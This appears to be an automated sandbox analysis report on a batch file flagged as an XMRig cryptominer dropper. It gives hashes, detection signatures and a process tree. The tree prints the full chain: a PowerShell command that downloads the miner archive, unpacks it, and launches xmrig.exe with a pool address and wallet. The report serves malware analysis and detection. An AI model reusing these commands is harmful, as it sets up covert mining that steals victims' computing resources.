xmrig | 04cf0194fb37bcc19b2b63904d84a74c720b64b7938620fdf971bb98a8f47ccd

Analysis

max time kernel
0s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2023, 10:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tesy - Copy (5).bat
Size

608B
MD5

727c8da0478af118c957ae60f7161cab
SHA1

cf18105b8659e93bbd2824fa35ef1bae7b395301
SHA256

97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
SHA512

d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01

Score

10^/10

xmrig miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip

Signatures

XMRig Miner payload 5 IoCs

miner

resource	yara_rule
behavioral18/files/0x0006000000023249-58.dat	family_xmrig
behavioral18/files/0x0006000000023249-58.dat	xmrig
behavioral18/memory/692-61-0x00007FF653940000-0x00007FF654443000-memory.dmp	xmrig
behavioral18/memory/692-62-0x00007FF653940000-0x00007FF654443000-memory.dmp	xmrig
behavioral18/memory/692-65-0x00007FF653940000-0x00007FF654443000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4496	powershell.exe
4496	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4496	powershell.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 3640 wrote to memory of 4496	3640	cmd.exe	18
PID 3640 wrote to memory of 4496	3640	cmd.exe	18

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (5).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"
  2⤵
  PID:2928
- C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
  xmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
  2⤵
  PID:692

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a5c074e56305e761d7cbc42993300e1c

SHA1
39b2e23ba5c56b4f332b3607df056d8df23555bf

SHA256
e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953

SHA512
c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ajedw5pj.bt1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0-gcc-win64.zip

Filesize
11KB

MD5
60b1971af03ea520704e3229bdd4e6bd

SHA1
30b15ef28133146d9ee996bc7153cee89d9b5e96

SHA256
ea9e639c176edac00ed3a541e0195f50e34ec7f1162809d8be5a849cd7def7c4

SHA512
3f752112a82e048e2d363e17ed44086089975f118c44f02c04dd22d471a292e35de8ae03615af70d334d0f32ab136612262c83a2b568a1429f32ad3966b9b564

Download Submit
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Filesize
202KB

MD5
98b570efd1aed98af8b9956db8c759fd

SHA1
5b4540df86e3dd11300e871549c30f57d2bcb4b3

SHA256
0bac2f736ec9103e522de13c08df37aef954142ceac623a8d2ade7fd5b863fd1

SHA512
d1f1a44186e931b4c5ddd9f9d314c25f419288b5faa3fbdb2fc38fa4df00dd6dca749d07f557cdfd9236bb6463f6ac3d252e442d5d626343850e870f9431729a

Download Submit
memory/692-69-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-71-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-78-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-77-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-76-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-75-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-74-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-73-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-72-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-68-0x0000028E77CF0000-0x0000028E77D10000-memory.dmp

Filesize
128KB

Download
memory/692-70-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-59-0x0000028E763C0000-0x0000028E763E0000-memory.dmp

Filesize
128KB

Download
memory/692-67-0x0000028E77CD0000-0x0000028E77CF0000-memory.dmp

Filesize
128KB

Download
memory/692-60-0x0000028E76400000-0x0000028E76420000-memory.dmp

Filesize
128KB

Download
memory/692-61-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-62-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-64-0x0000028E77CF0000-0x0000028E77D10000-memory.dmp

Filesize
128KB

Download
memory/692-63-0x0000028E77CD0000-0x0000028E77CF0000-memory.dmp

Filesize
128KB

Download
memory/692-65-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/692-66-0x00007FF653940000-0x00007FF654443000-memory.dmp

Filesize
11.0MB

Download
memory/2928-33-0x0000021ECCC70000-0x0000021ECCC7A000-memory.dmp

Filesize
40KB

Download
memory/2928-56-0x00007FFACE5E0000-0x00007FFACF0A1000-memory.dmp

Filesize
10.8MB

Download
memory/2928-32-0x0000021ECEF50000-0x0000021ECEF62000-memory.dmp

Filesize
72KB

Download
memory/2928-31-0x0000021ECCC90000-0x0000021ECCCA0000-memory.dmp

Filesize
64KB

Download
memory/2928-28-0x00007FFACE5E0000-0x00007FFACF0A1000-memory.dmp

Filesize
10.8MB

Download
memory/2928-29-0x0000021ECCC90000-0x0000021ECCCA0000-memory.dmp

Filesize
64KB

Download
memory/2928-30-0x0000021ECCC90000-0x0000021ECCCA0000-memory.dmp

Filesize
64KB

Download
memory/4496-11-0x0000020DC39E0000-0x0000020DC39F0000-memory.dmp

Filesize
64KB

Download
memory/4496-12-0x0000020DC39E0000-0x0000020DC39F0000-memory.dmp

Filesize
64KB

Download
memory/4496-16-0x00007FFACE5E0000-0x00007FFACF0A1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-10-0x00007FFACE5E0000-0x00007FFACF0A1000-memory.dmp

Filesize
10.8MB

Download
memory/4496-0-0x0000020DC39A0000-0x0000020DC39C2000-memory.dmp

Filesize
136KB

Download